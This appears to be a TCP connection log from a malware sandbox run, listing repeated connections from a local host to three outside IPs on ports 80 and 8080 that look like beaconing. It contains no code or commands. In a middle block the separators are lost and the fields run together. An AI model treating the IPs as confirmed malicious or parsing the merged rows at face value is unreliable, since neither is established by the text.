Oct 18, 2024 12:41:40.216084003 CEST | 49707 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:40.216442108 CEST | 49712 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:40.227605104 CEST | 80 | 49712 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:41.392676115 CEST | 80 | 49712 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:41.392776012 CEST | 80 | 49712 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:41.392790079 CEST | 80 | 49712 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:41.407737017 CEST | 49712 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:42.121105909 CEST | 49713 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:42.158437014 CEST | 8080 | 49713 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:41:42.158603907 CEST | 49713 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:46.308888912 CEST | 49712 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:46.309292078 CEST | 49713 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:48.254085064 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:48.264017105 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:48.264127970 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:48.271367073 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:48.276635885 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:49.368335962 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:49.368405104 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:49.368809938 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:49.368823051 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:49.368853092 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:49.368865967 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:49.369576931 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:49.369623899 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:49.381620884 CEST | 49719 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:49.386888981 CEST | 8080 | 49719 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:41:49.386981964 CEST | 49719 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:49.387331009 CEST | 49719 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:49.393112898 CEST | 8080 | 49719 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:41:53.402228117 CEST | 49719 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:54.338845968 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:54.339137077 CEST | 49721 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:54.345889091 CEST | 80 | 49721 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:54.345961094 CEST | 49721 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:54.347297907 CEST | 80 | 49716 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:54.347371101 CEST | 49716 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:54.357119083 CEST | 49721 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:54.362607956 CEST | 80 | 49721 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:55.419142008 CEST | 80 | 49721 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:55.419203997 CEST | 49721 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:55.419325113 CEST | 80 | 49721 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:55.419339895 CEST | 80 | 49721 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:55.419364929 CEST | 49721 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:55.419397116 CEST | 49721 | 80 | 192.168.2.9 | 185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.430495977 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.435798883 CEST808049722190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.435863018 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.460707903 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.466573954 CEST808049722190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.701402903 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.415596962 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.415884018 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.420747042 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.420811892 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421020031 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421087980 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421144009 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.425781012 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531562090 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531630993 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531630993 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531642914 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531670094 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531681061 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.714550972 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.720920086 CEST808049724190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.721206903 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.726022005 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.730875969 CEST808049724190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.031030893 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.498114109 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.498550892 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.503448963 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.503621101 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.504462957 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.504525900 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.535890102 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.540817976 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602833033 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602885962 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602900028 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602989912 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602989912 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.645944118 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.650979042 CEST808049726190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.651221037 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.652932882 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.657850981 CEST808049726190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.645323038 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.144567966 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.144908905 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.149842024 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.149909019 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.151118040 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.151175976 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.168298960 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.173223972 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239604950 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239654064 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239662886 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239674091 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239675999 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239726067 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239736080 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.258826971 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.263808012 CEST808049728190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.263870955 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.298513889 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.303328991 CEST808049728190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.298574924 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.532536983 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.535013914 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.538095951 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.538160086 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.539891958 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.540054083 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.541049004 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.545871973 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602365971 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602384090 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602435112 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602474928 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602488995 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602500916 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.082730055 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.386722088 CEST808049741190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.386863947 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.483916998 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.489927053 CEST808049741190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:47.487267017 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.424328089 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.424638033 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.485589027 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.485690117 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.486850977 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.486944914 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.519427061 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.555041075 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.865255117 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.865346909 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866540909 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866552114 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866585016 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866600037 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.896806955 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.896866083 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.143520117 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.148621082 CEST808049767190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.148726940 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.191215992 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.196377039 CEST808049767190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.346733093 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.926558018 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.926901102 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932348013 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932426929 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932490110 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932563066 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.940896988 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.945888042 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.007972002 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008053064 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008063078 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008069038 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008075953 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008107901 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.294420004 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.301677942 CEST808049789190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.301784992 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.347258091 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.356161118 CEST808049789190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.351727962 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.602912903 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.603209972 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610176086 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610260010 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610724926 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610790968 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.612019062 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.617068052 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755256891 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755353928 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755389929 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755400896 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755438089 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755465984 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755737066 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755780935 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.806994915 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.811851978 CEST808049814190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.811924934 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.812066078 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.817497015 CEST808049814190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:05.816067934 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.051587105 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.051903963 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.056817055 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.056895018 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.057049990 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.057744980 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.058968067 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.062273979 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131195068 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131222963 CEST8049835185.53.178.50192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 12:43:07.131232023 CEST | 80 | 49835 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:07.131282091 CEST | 49835 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:07.131315947 CEST | 49835 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:07.131335020 CEST | 80 | 49835 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:07.131375074 CEST | 49835 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:07.393351078 CEST | 49842 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:07.398277998 CEST | 8080 | 49842 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:07.398353100 CEST | 49842 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:07.398519039 CEST | 49842 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:07.404043913 CEST | 8080 | 49842 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:11.408873081 CEST | 49842 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:11.908468962 CEST | 49835 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:11.908751011 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:11.913628101 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:11.913711071 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:11.913794041 CEST | 80 | 49835 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:11.913840055 CEST | 49835 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:11.935051918 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:11.939908981 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:12.691179991 CEST | 49867 | 80 | 192.168.2.9 | 194.5.152.215
Oct 18, 2024 12:43:12.696022034 CEST | 80 | 49867 | 194.5.152.215 | 192.168.2.9
Oct 18, 2024 12:43:12.696127892 CEST | 49867 | 80 | 192.168.2.9 | 194.5.152.215
Oct 18, 2024 12:43:12.696280003 CEST | 49867 | 80 | 192.168.2.9 | 194.5.152.215
Oct 18, 2024 12:43:12.701073885 CEST | 80 | 49867 | 194.5.152.215 | 192.168.2.9
Oct 18, 2024 12:43:12.995506048 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:12.995536089 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:12.995548964 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:12.995587111 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:12.995615959 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:12.995657921 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:13.330749035 CEST | 49870 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:13.503681898 CEST | 8080 | 49870 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:13.503812075 CEST | 49870 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:13.535052061 CEST | 49870 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:13.540208101 CEST | 8080 | 49870 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:17.555325985 CEST | 49870 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:18.791716099 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:18.792023897 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:18.796395063 CEST | 80 | 49867 | 194.5.152.215 | 192.168.2.9
Oct 18, 2024 12:43:18.796972990 CEST | 80 | 49889 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:18.796986103 CEST | 80 | 49861 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:18.797058105 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:18.797080040 CEST | 49861 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:18.817353964 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:18.822155952 CEST | 80 | 49889 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:18.923351049 CEST | 80 | 49867 | 194.5.152.215 | 192.168.2.9
Oct 18, 2024 12:43:18.923434973 CEST | 49867 | 80 | 192.168.2.9 | 194.5.152.215
Oct 18, 2024 12:43:18.929951906 CEST | 49867 | 80 | 192.168.2.9 | 194.5.152.215
Oct 18, 2024 12:43:18.934802055 CEST | 80 | 49867 | 194.5.152.215 | 192.168.2.9
Oct 18, 2024 12:43:19.906209946 CEST | 80 | 49889 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:19.906275988 CEST | 80 | 49889 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:19.906290054 CEST | 80 | 49889 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:19.906299114 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:19.906368017 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:19.919522047 CEST | 49899 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:19.924649954 CEST | 8080 | 49899 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:19.924724102 CEST | 49899 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:19.929708004 CEST | 49899 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:19.934695005 CEST | 8080 | 49899 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:23.986855984 CEST | 49899 | 8080 | 192.168.2.9 | 190.120.227.91
